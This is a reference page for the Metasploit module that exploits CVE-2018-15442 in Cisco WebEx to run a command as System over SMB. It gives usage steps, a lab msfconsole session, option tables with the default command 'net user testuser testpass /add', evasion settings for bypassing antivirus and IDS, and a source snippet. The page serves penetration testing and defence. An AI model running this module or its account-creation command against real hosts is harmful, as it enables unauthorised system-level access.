WebEx Remote Command Execution Utility - Metasploit


This page contains detailed information about how to use the auxiliary/admin/smb/webexec_command metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WebEx Remote Command Execution Utility
Module: auxiliary/admin/smb/webexec_command
Source code: modules/auxiliary/admin/smb/webexec_command.rb
Disclosure date: -
Last modification time: 2018-10-24 16:18:17 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2018-15442

This module enables the execution of a single command as System by exploiting a remote code execution vulnerability in Cisco's WebEx client software.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/admin/smb/webexec_command
msf auxiliary(webexec_command) > show options
    ... show and set options ...
msf auxiliary(webexec_command) > set RHOSTS ip-range
msf auxiliary(webexec_command) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(webexec_command) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(webexec_command) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(webexec_command) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a remote code execution vulnerability in Cisco's WebEx client software versions < v33.6.0.655 By supplying valid login credentials to the target machine, a single command can be executed with System privileges.

Vulnerable Application


Cisco WebEx Client v33.3.8.7 and below

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/admin/smb/webexec_command
  4. Do: set RHOSTS <IP>
  5. Do: set SMBUser <USERNAME>
  6. Do: set SMBPass <PASSWORD>
  7. Do: run
  8. You should get output that verifies the execution of the command

Options


FORCE_GUI

Uses WMIC to create a GUI

Scenarios


Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86

  msf5 > use auxiliary/admin/smb/webexec_command 
  msf5 auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136
  rhosts => 192.168.37.136
  msf5 auxiliary(admin/smb/webexec_command) > set smbuser a_user
  smbuser => a_user
  msf5 auxiliary(admin/smb/webexec_command) > set smbpass password
  smbpass => password
  msf5 auxiliary(admin/smb/webexec_command) > run

  [+] 192.168.37.136:445    - Command completed!
  [*] 192.168.37.136:445    - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf5 auxiliary(admin/smb/webexec_command) > 

Go back to menu.

Msfconsole Usage


Here is how the admin/smb/webexec_command auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/smb/webexec_command

msf6 auxiliary(admin/smb/webexec_command) > show info

       Name: WebEx Remote Command Execution Utility
     Module: auxiliary/admin/smb/webexec_command
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Ron Bowes <[email protected]>

Check supported:
  No

Basic options:
  Name          Current Setting                  Required  Description
  ----          ---------------                  --------  -----------
  COMMAND       net user testuser testpass /add  yes       The command you want to execute on the remote host
  FORCE_GUI     false                            yes       Ensure a GUI is created via wmic
  RHOSTS                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         445                              yes       The Target port (TCP)
  SERVICE_NAME  WebExService                     no        The service name
  SMBDomain     .                                no        The Windows domain to use for authentication
  SMBPass                                        no        The password for the specified username
  SMBUser                                        no        The username to authenticate as
  THREADS       1                                yes       The number of concurrent threads (max one per host)

Description:
  This module enables the execution of a single command as System by 
  exploiting a remote code execution vulnerability in Cisco's WebEx 
  client software.

References:
  https://webexec.org
  https://nvd.nist.gov/vuln/detail/CVE-2018-15442

Module Options


This is a complete list of options available in the admin/smb/webexec_command auxiliary module:

msf6 auxiliary(admin/smb/webexec_command) > show options

Module options (auxiliary/admin/smb/webexec_command):

   Name          Current Setting                  Required  Description
   ----          ---------------                  --------  -----------
   COMMAND       net user testuser testpass /add  yes       The command you want to execute on the remote host
   FORCE_GUI     false                            yes       Ensure a GUI is created via wmic
   RHOSTS                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         445                              yes       The Target port (TCP)
   SERVICE_NAME  WebExService                     no        The service name
   SMBDomain     .                                no        The Windows domain to use for authentication
   SMBPass                                        no        The password for the specified username
   SMBUser                                        no        The username to authenticate as
   THREADS       1                                yes       The number of concurrent threads (max one per host)

Advanced Options


Here is a complete list of advanced options supported by the admin/smb/webexec_command auxiliary module:

msf6 auxiliary(admin/smb/webexec_command) > show advanced

Module advanced options (auxiliary/admin/smb/webexec_command):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   CHOST                                      no        The local client address
   CPORT                                      no        The local client port
   ConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connection
   DCERPC::ReadTimeout     10                 yes       The number of seconds to wait for DCERPC responses
   NTLM::SendLM            true               yes       Always send the LANMAN response (except when NTLMv2_session is specified)
   NTLM::SendNTLM          true               yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
   NTLM::SendSPN           true               yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
   NTLM::UseLMKey          false              yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
   NTLM::UseNTLM2_session  true               yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
   NTLM::UseNTLMv2         true               yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   SMB::AlwaysEncrypt      true               yes       Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
   SMB::ChunkSize          500                yes       The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
   SMB::Native_LM          Windows 2000 5.0   yes       The Native LM to send during authentication
   SMB::Native_OS          Windows 2000 2195  yes       The Native OS to send during authentication
   SMB::ProtocolVersion    1,2,3              yes       One or a list of coma-separated SMB protocol versions to negotiate (e.g. "1" or "1,2" or "2,3,1")
   SMB::VerifySignature    false              yes       Enforces client-side verification of server response signatures
   SMBDirect               true               no        The target port is a raw SMB service (not NetBIOS)
   SMBName                 *SMBSERVER         yes       The NetBIOS hostname (required for port 139 connections)
   SSL                     false              no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                  no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER               no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto               yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress            true               yes       Display progress messages during a scan
   ShowProgressPercent     10                 yes       The interval in percent that progress should be shown
   VERBOSE                 false              no        Enable detailed status messages
   WORKSPACE                                  no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/smb/webexec_command module can do:

msf6 auxiliary(admin/smb/webexec_command) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/smb/webexec_command auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/smb/webexec_command) > show evasion

Module evasion options:

   Name                             Current Setting  Required  Description
   ----                             ---------------  --------  -----------
   DCERPC::fake_bind_multi          true             no        Use multi-context bind calls
   DCERPC::fake_bind_multi_append   0                no        Set the number of UUIDs to append the target
   DCERPC::fake_bind_multi_prepend  0                no        Set the number of UUIDs to prepend before the target
   DCERPC::max_frag_size            4096             yes       Set the DCERPC packet fragmentation size
   DCERPC::smb_pipeio               rw               no        Use a different delivery method for accessing named pipes (Accepted: rw, trans)
   SMB::obscure_trans_pipe_level    0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)
   SMB::pad_data_level              0                yes       Place extra padding between headers and data (level 0-3)
   SMB::pad_file_level              0                yes       Obscure path names used in open/create (level 0-3)
   SMB::pipe_evasion                false            yes       Enable segmented read/writes for SMB Pipes
   SMB::pipe_read_max_size          1024             yes       Maximum buffer size for pipe reads
   SMB::pipe_read_min_size          1                yes       Minimum buffer size for pipe reads
   SMB::pipe_write_max_size         1024             yes       Maximum buffer size for pipe writes
   SMB::pipe_write_min_size         1                yes       Minimum buffer size for pipe writes
   TCP::max_send_size               0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                  0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to authenticate with given credentials: <AUTHERROR>


Here is a relevant code snippet related to the "Unable to authenticate with given credentials: <AUTHERROR>" error message:

47:	    # Try and authenticate with given credentials
48:	    if connect
49:	      begin
50:	        smb_login
51:	      rescue Rex::Proto::SMB::Exceptions::Error => autherror
52:	        print_error("Unable to authenticate with given credentials: #{autherror}")
53:	        return
54:	      end
55:	
56:	      command = datastore['COMMAND']
57:	      if datastore['FORCE_GUI']

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.